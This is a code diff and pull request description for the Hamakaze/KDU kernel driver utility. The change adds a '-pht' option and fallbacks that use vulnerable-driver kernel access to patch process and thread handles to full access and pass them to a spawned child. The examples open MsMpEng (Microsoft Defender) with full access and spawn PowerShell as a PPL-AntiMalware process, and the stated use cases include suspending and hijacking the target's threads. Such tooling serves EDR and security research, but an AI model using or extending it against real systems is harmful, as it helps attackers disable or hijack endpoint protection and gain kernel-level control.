         if ((pBasicInfo->GrantedAccess & accessMask) == accessMask) {
-            printf("[+] The handle %p already has the required rights 0x%lX to the target process.\n", hHandle, accessMask);
+            printf("[+] Ok: The handle %p already has the required rights 0x%lX to the target process.\n", hHandle, accessMask);
             return TRUE;
         }
         else {
             printf("[-] Warning: Handle %p only has access rights: 0x%lX. Attempting to modify...\n", hHandle, pBasicInfo->GrantedAccess);
 
             // attempt to modify the handle's access rights using KDUControlHandleAccess
-            if (KDUControlHandleAccess(Context, GetCurrentProcessId(), hHandle, PROCESS_ALL_ACCESS)) {
-                printf("[+] Success: Modified the handle's access rights to requested rights 0x%lX.\n", accessMask);
-                return TRUE;
-            }
-            else {
-                printf("[!] Failed to modify the handle's access rights.\n");
-                return FALSE;
-            }
+            return KDUControlHandleAccess(Context, GetCurrentProcessId(), hHandle, PROCESS_ALL_ACCESS);
         }
     }
     else {
@@ -979,35 +972,50 @@ BOOL KDURunCommandInheritee(
     _In_ BOOL OpenThreads,
     _In_ ULONG_PTR PPLLevel)
 {
-
-	if (!KDUVerifyProviderCallbacksForOpenProcess(Context)) {
-		printf_s("[!] Provider does not support required callbacks for handle duplication\r\n");
-		return FALSE;
-	}
-
-	// open the target process with PROCESS_ALL_ACCESS and set the handle to be inheritable
+	// try to open the target process directly with PROCESS_ALL_ACCESS
     HANDLE hTargetProc;
-    if (KDUOpenProcess(Context, (HANDLE)TargetProcessId, PROCESS_ALL_ACCESS, &hTargetProc)) {
-		printf_s("[+] Opened target process with PID %llu and got hProc %p\r\n", TargetProcessId, hTargetProc);
-        if (!KDUSetHandleInheritable(hTargetProc)) {
-			printf("[!] Not continuing due to failure in setting handle inheritance.\n");
-            return FALSE;
+    hTargetProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, (DWORD)TargetProcessId);
+    if (hTargetProc == NULL) {
+        
+        // fallback to PROCESS_QUERY_LIMITED_INFORMATION
+        hTargetProc = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, FALSE, (DWORD)TargetProcessId);
+        
+        if (hTargetProc == NULL) {
+            // fallback to KDUOpenProcess when user-mode cannot open target proc
+            printf_s("[-] Target process %llu cannot be opened via user-mode, fallback to KDUOpenProcess()\r\n", TargetProcessId);
+
+            if (!KDUVerifyProviderCallbacksForOpenProcess(Context)) {
+                supPrintfEvent(kduEventError, "[!] Abort: selected provider does not support arbitrary process handle acquisition.\r\n");
+                return FALSE;
+            }
+            if (!KDUOpenProcess(Context, (HANDLE)TargetProcessId, PROCESS_ALL_ACCESS, &hTargetProc)) {
+                printf("[!] Failed to open target process %llu via user- and kernel-mode.", TargetProcessId);
+                return FALSE;
+            }
+            printf_s("[+] Opened target process %llu via KDUOpenProcess and got hProc %p\r\n", TargetProcessId, hTargetProc);
+        }
+        else {
+            printf_s("[+] Opened target process %llu with PROCESS_QUERY_LIMITED_INFORMATION and got hProc %p\r\n", TargetProcessId, hTargetProc);
         }
     }
     else {
-		printf("[!] Failed to open target process with PID %llu.", TargetProcessId);
-		return FALSE;
+        printf_s("[+] Opened target process %llu with PROCESS_ALL_ACCESS and got hProc %p\r\n", TargetProcessId, hTargetProc);
     }
 
-    // check if handle has PROCESS_FULL_ACCESS rights
+    // now check if handle has PROCESS_FULL_ACCESS rights (requesting FULL_ACCESS may still lead to stripped access)
 	if (!KDUSetAccessRights(Context, hTargetProc, PROCESS_ALL_ACCESS)) {
 		printf("[!] Not continuing due to failure in setting handle access rights.\n");
 		return FALSE;
 	}
 
+	// check if handle is inheritable, if not, set it to be inheritable
+    if (!KDUSetHandleInheritable(hTargetProc)) {
+        printf("[!] Not continuing due to failure in setting handle inheritance.\n");
+        return FALSE;
+    }
+
 	// open all process threads if requested, set them to be inheritable and patch to THREAD_ALL_ACCESS
 	if (OpenThreads) {
-        printf("here\n");
 		std::vector<HANDLE> threadHandles;
 
 		HANDLE hThreadSnap = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);
@@ -1031,7 +1039,7 @@ BOOL KDURunCommandInheritee(
 					}
                     if (KDUSetHandleInheritable(hThread)) {
 						threadHandles.push_back(hThread);
-                    } // else ignore the thread if not inheritable (rip us)
+                    } // else ignore the thread if not inheritable, should not happen, if still rip us
 				}
 			} while (Thread32Next(hThreadSnap, &te32));
             CloseHandle(hThreadSnap);
@@ -1042,14 +1050,14 @@ BOOL KDURunCommandInheritee(
 			return FALSE;
 		}
 
-        // check if the thread handles have THREAD_ALL_ACCESS rights, if not, use KDUSetAccessRights
+        // check if the thread handles have THREAD_ALL_ACCESS rights, if not, patch it
         int err = 0;
         for (auto& hThread : threadHandles) {
             if (!KDUSetAccessRights(Context, hThread, THREAD_ALL_ACCESS)) {
                 err++;
             }
         }
-        printf("[!] Continuing despite not having THREAD_ALL_ACCESS on %i thread(s).\n", err);
+        printf("[-] Continuing despite not having THREAD_ALL_ACCESS on %i out of %llu thread(s).\n", err, threadHandles.size());
 	}
 
     STARTUPINFO si;

--- a/Source/Hamakaze/ps.cpp
+++ b/Source/Hamakaze/ps.cpp
@@ -958,11 +958,11 @@ BOOL KDUSetAccessRights(PKDU_CONTEXT Context, HANDLE hHandle, ACCESS_MASK access
 }
 
 /*
-* KDURunCommandDup
+* KDURunCommandInheritee
 *
 * Purpose:
 *
-* Start a Process to duplicate a handle into
+* Open handles and start a process which will inherit these handles
 *
 */
 BOOL KDURunCommandInheritee(

--- a/Source/Hamakaze/ps.h
+++ b/Source/Hamakaze/ps.h
@@ -52,6 +52,8 @@
 #define PS_MITIGATION_FLAGS1 0x00000001
 #define PS_MITIGATION_FLAGS2 0x00000002
 
+#define MAX_THREADS 0x400 // not opening and patching more than X threads
+
 // credits to https://www.vergiliusproject.com/kernels/x64/windows-11/25h2/_EPROCESS
 #define ObjectTableOffset_19041 0x570 // 2004, 20H2, ..., 23H2
 #define ObjectTableOffset_26100 0x300 // 24H2, 25H2

--- a/Source/Hamakaze/ps.h
+++ b/Source/Hamakaze/ps.h
@@ -112,4 +112,5 @@ BOOL KDURunCommandInheritee(
     _In_ PKDU_CONTEXT Context,
     _In_ LPWSTR CommandLine,
     _In_ ULONG_PTR TargetProcessId,
+    _In_ BOOL OpenThreads,
     _In_ ULONG_PTR PPLLevel);


### PR DESCRIPTION
# What
* **new command line option `-pht`**, only with `-pho`, to also open and inherit all threads of a given process with full access
* also **new strategy** to open process handles, improved to previous `-pho`, may remove reliance on implemented driver callbacks
  * first try to open process with `PROCESS_ALL_ACCESS` (works except PPL)
  * then fallback to `PROCESS_QUERY_LIMITED_INFORMATION` (should work on all procs)
  * then fallback to `KDUOpenProcess` (2nd fallback)
  * and then check if the handle was stripped (in case of kernel callbacks) and patch to `PROCESS_ALL_ACCESS` again

## Example 1
spawns powershell.exe as PPL-AntiMalware with full access to MsMpEng and all its threads
```powershell
kdu.exe -pho (Get-Process MsMpEng).Id -pht -phc powershell.exe -prv 64
```

## Example 2
execute [Handler.exe](https://github.com/evilele/EDR-Introspection/raw/9d99879093fa3736aab91c91072260e8ab320422/x64/Release/Handler.exe) as in [main.cpp](https://github.com/evilele/EDR-Introspection/raw/9d99879093fa3736aab91c91072260e8ab320422/misc/Handler/main.cpp), which enumerates all process **and thread handles** in Handler.exe and prints the loaded modules of the referenced processes
```powershell
kdu.exe -pho (Get-Process MsMpEng).Id -phc Handler.exe -prv 39
```

# Why
* having a `PROCESS_ALL_ACCESS` handle of a process does not always lead to `THREAD_ALL_ACCESS` 

## Use-Cases
* `-pht` also allows to read the registers or control thread state as in suspend, hijack, resume 

# How
* also open and patch thread handles when supplying `-pht` to a `-pho` process
* opening and patching thread handles uses the same code as opening and patching process handles (yay)

## KDU opens handles - set inherit and patch access
<img width="1306" height="878" alt="image" src="https://github.com/user-attachments/assets/923710e4-ff4d-4a3c-9c3b-e9e6d37867b7" />

## Spawned Handler.exe enumerating process handles
<img width="1293" height="625" alt="image" src="https://github.com/user-attachments/assets/536e000a-d7cf-4a57-8148-bf1c8950416e" />

## Spawned Handler.exe enumerating thread handeles
<img width="1293" height="625" alt="image" src="https://github.com/user-attachments/assets/d394f271-a90c-4f9b-ac16-df421b94ce09" />